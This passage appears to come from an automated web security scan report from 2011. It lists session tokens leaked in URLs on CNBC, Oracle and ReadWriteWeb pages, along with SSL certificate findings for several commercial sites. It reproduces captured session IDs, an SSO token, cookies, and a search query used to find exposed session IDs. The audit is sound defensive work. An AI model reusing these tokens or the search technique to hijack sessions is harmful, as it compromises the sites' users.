The response contains the following links that appear to contain session tokens:http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0 http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe's+Economy&page=1 http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check
Request
GET /search?sourceid=chrome&ie=UTF-8&q=site%3Acnbc.com+JSESSIONID HTTP/1.1 Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:13:56 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Get-Dictionary: /sdch/StnTz5pY.dct Server: gws X-XSS-Protection: 1; mode=block Content-Length: 102810 <!doctype html> <head> <title>site:cnbc.com JSESSIONID - Google Search</title> <script>window.google={kEI:"tDhmToK0BcfciAKMtYzGCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra','','','','1','','0CBoQFjAA')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth','','','','2','','0CCAQFjAB')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief','','','','3','','0CCYQFjAC')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F','','','','4','','0CCwQFjAD')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst','','','','5','','0CDIQFjAE')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction','','','','6','','0CDgQFjAF')"> Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer','','','','7','','0CD4QFjAG')"> Remove - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0','','','','8','','0CEQQFjAH')"> Add to Cart - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe's+Economy&page=1" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe\'s+Economy&page=1','','','','9','','0CEoQFjAI')"> Add to Cart - Shopping Cart</a>...[SNIP]... <h3 class="r"><a href="http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFAQFjAJ')"> Clips about Commodity Price Check - Video Reprints - CNBC.com</a>...[SNIP]...
8.39. http://www.oracle.com/us/technologies/virtualization/index.html
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.oracle.com
Path:
/us/technologies/virtualization/index.html
Issue detail
The response contains the following links that appear to contain session tokens:http://event.on24.com/view/presentation/flash/EventConsoleMVC.html?titlecolor=000000&simulive=y&eventid=230989&sessionid=1&username=&partnerref=ocomvirtbanner&format=fhaudio&key=A6199BFA52B30C22E040FB8EC497CF7A&text_language_id=en&playerwidth=793&playerheight=597&overwritelobby=y&eventuserid=39776441&contenttype=A&mediametricsessionid=39052776&mediametricid=597453&usercd=39776441&mode=launch
Request
GET /us/technologies/virtualization/index.html HTTP/1.1 Host: www.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1) Date: Tue, 06 Sep 2011 16:16:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 144444 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=...[SNIP]... <li>Video: <a href="http://event.on24.com/view/presentation/flash/EventConsoleMVC.html?titlecolor=000000&simulive=y&eventid=230989&sessionid=1&username=&partnerref=ocomvirtbanner&format=fhaudio&key=A6199BFA52B30C22E040FB8EC497CF7A&text_language_id=en&playerwidth=793&playerheight=597&overwritelobby=y&eventuserid=39776441&contenttype=A&mediametricsessionid=39052776&mediametricid=597453&usercd=39776441&mode=launch#"> Virtualization Trends: What You Need to Know Now</a>...[SNIP]...
8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.oracle.com
Path:
/webapps/dialogue/dlgpage.jsp
Issue detail
The response contains the following links that appear to contain session tokens:https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF
Request
GET /webapps/dialogue/dlgpage.jsp HTTP/1.1 Host: www.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:08:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 971 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Redirect to Oracle SSO Server</TITLE> </HEAD><BODY> <H1>Redirect to Oracle SSO Server</H1> The document has moved <A HREF="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF"> here</A>...[SNIP]...
8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.readwriteweb.com
Path:
/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
Issue detail
The response contains the following links that appear to contain session tokens:http://www.apture.com/js/apture.js?siteToken=H0arRY0
Request
GET /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 HTTP/1.1 Host: www.readwriteweb.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mobify=0
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:32:49 GMT Server: Apache/2.x (Hardened) Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT ETag: "8f7c-48f20ec4c6e40" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Length: 36732 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">...[SNIP]... </script><script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"> </script>...[SNIP]...
8.42. http://www.readwriteweb.com/404.html
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.readwriteweb.com
Path:
/404.html
Issue detail
The response contains the following links that appear to contain session tokens:http://www.apture.com/js/apture.js?siteToken=H0arRY0
Request
GET /404.html HTTP/1.1 Host: www.readwriteweb.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B; PHPSESSID=uu8u8il3haqs9qituee6bsgku7
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:56 GMT Server: Apache/2.x (Hardened) Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT ETag: "8f7c-48f20ec4c6e40" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Length: 36732 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">...[SNIP]... </script><script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"> </script>...[SNIP]...
9. SSL certificate
previous
next
There are 22 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed. It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
9.1. https://account.bigcommerce.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://account.bigcommerce.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: *.bigcommerce.com Issued by: DigiCert High Assurance CA-3 Valid from: Mon Dec 07 18:00:00 GMT-06:00 2009 Valid to: Tue Dec 11 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: DigiCert High Assurance CA-3 Issued by: DigiCert High Assurance EV Root CA Valid from: Mon Apr 02 18:00:00 GMT-06:00 2007 Valid to: Sat Apr 02 18:00:00 GMT-06:00 2022
Certificate chain #2 Issued to: DigiCert High Assurance EV Root CA Issued by: Entrust.net Secure Server Certification Authority Valid from: Sat Sep 30 23:00:00 GMT-06:00 2006 Valid to: Sat Jul 26 12:15:15 GMT-06:00 2014
Certificate chain #3 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
9.2. https://myshopify.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://myshopify.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not valid for the server's hostname. The server presented the following certificates:Server certificate Issued to: *.myshopify.com Issued by: Equifax Secure Certificate Authority Valid from: Mon May 10 16:23:08 GMT-06:00 2010 Valid to: Wed Aug 12 13:17:14 GMT-06:00 2015
Certificate chain #1 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
9.3. https://support.bigcommerce.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://support.bigcommerce.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: *.bigcommerce.com Issued by: DigiCert High Assurance CA-3 Valid from: Mon Dec 07 18:00:00 GMT-06:00 2009 Valid to: Tue Dec 11 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: DigiCert High Assurance CA-3 Issued by: DigiCert High Assurance EV Root CA Valid from: Mon Apr 02 18:00:00 GMT-06:00 2007 Valid to: Sat Apr 02 18:00:00 GMT-06:00 2022
Certificate chain #2 Issued to: DigiCert High Assurance EV Root CA Issued by: Entrust.net Secure Server Certification Authority Valid from: Sat Sep 30 23:00:00 GMT-06:00 2006 Valid to: Sat Jul 26 12:15:15 GMT-06:00 2014
Certificate chain #3 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
9.4. https://www.bigcommerce.com/
previous
next
Summary
Severity:
Medium
Confidence:
Certain
Host:
https://www.bigcommerce.com
Path:
/
Issue detail
The following problem was identified with the server's SSL certificate:The server's certificate is not trusted. The server presented the following certificates:Server certificate Issued to: *.bigcommerce.com Issued by: DigiCert High Assurance CA-3 Valid from: Mon Dec 07 18:00:00 GMT-06:00 2009 Valid to: Tue Dec 11 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: DigiCert High Assurance CA-3 Issued by: DigiCert High Assurance EV Root CA Valid from: Mon Apr 02 18:00:00 GMT-06:00 2007 Valid to: Sat Apr 02 18:00:00 GMT-06:00 2022
Certificate chain #2 Issued to: DigiCert High Assurance EV Root CA Issued by: Entrust.net Secure Server Certification Authority Valid from: Sat Sep 30 23:00:00 GMT-06:00 2006 Valid to: Sat Jul 26 12:15:15 GMT-06:00 2014
Certificate chain #3 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
9.5. https://bugzilla.mozilla.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://bugzilla.mozilla.org
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.mozilla.org Issued by: Equifax Secure Certificate Authority Valid from: Mon Nov 30 21:42:54 GMT-06:00 2009 Valid to: Fri Dec 02 04:55:27 GMT-06:00 2011
Certificate chain #1 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
9.6. https://cms.paypal.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cms.paypal.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.paypal.com,ST=California Issued by: Akamai Subordinate CA 3 Valid from: Fri Apr 08 12:05:24 GMT-06:00 2011 Valid to: Sun Apr 08 12:05:24 GMT-06:00 2012
Certificate chain #1 Issued to: Akamai Subordinate CA 3 Issued by: GTE CyberTrust Global Root Valid from: Thu May 11 09:32:00 GMT-06:00 2006 Valid to: Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2 Issued to: GTE CyberTrust Global Root Issued by: GTE CyberTrust Global Root Valid from: Wed Aug 12 18:29:00 GMT-06:00 1998 Valid to: Mon Aug 13 17:59:00 GMT-06:00 2018
9.7. https://deloitte.zettaneer.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://deloitte.zettaneer.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.zettaneer.com Issued by: Network Solutions Certificate Authority Valid from: Wed May 11 18:00:00 GMT-06:00 2011 Valid to: Fri May 29 17:59:59 GMT-06:00 2015
Certificate chain #1 Issued to: Network Solutions Certificate Authority Issued by: UTN-USERFirst-Hardware Valid from: Sun Apr 09 18:00:00 GMT-06:00 2006 Valid to: Sat May 30 04:48:38 GMT-06:00 2020
Certificate chain #2 Issued to: UTN-USERFirst-Hardware Issued by: AddTrust External CA Root Valid from: Tue Jun 07 02:09:10 GMT-06:00 2005 Valid to: Sat May 30 04:48:38 GMT-06:00 2020
Certificate chain #3 Issued to: AddTrust External CA Root Issued by: AddTrust External CA Root Valid from: Tue May 30 04:48:38 GMT-06:00 2000 Valid to: Sat May 30 04:48:38 GMT-06:00 2020
9.8. https://dne.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://dne.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Wed Mar 30 18:00:00 GMT-06:00 2011 Valid to: Tue Jul 31 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9.9. https://docs.google.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://docs.google.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.google.com Issued by: Google Internet Authority Valid from: Thu Aug 11 21:49:02 GMT-06:00 2011 Valid to: Sat Aug 11 21:59:02 GMT-06:00 2012
Certificate chain #1 Issued to: Google Internet Authority Issued by: Equifax Secure Certificate Authority Valid from: Mon Jun 08 14:43:27 GMT-06:00 2009 Valid to: Fri Jun 07 13:43:27 GMT-06:00 2013
Certificate chain #2 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
9.10. https://education.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://education.oracle.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: *.oracle.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Wed Mar 30 18:00:00 GMT-06:00 2011 Valid to: Tue Jul 31 17:59:59 GMT-06:00 2012
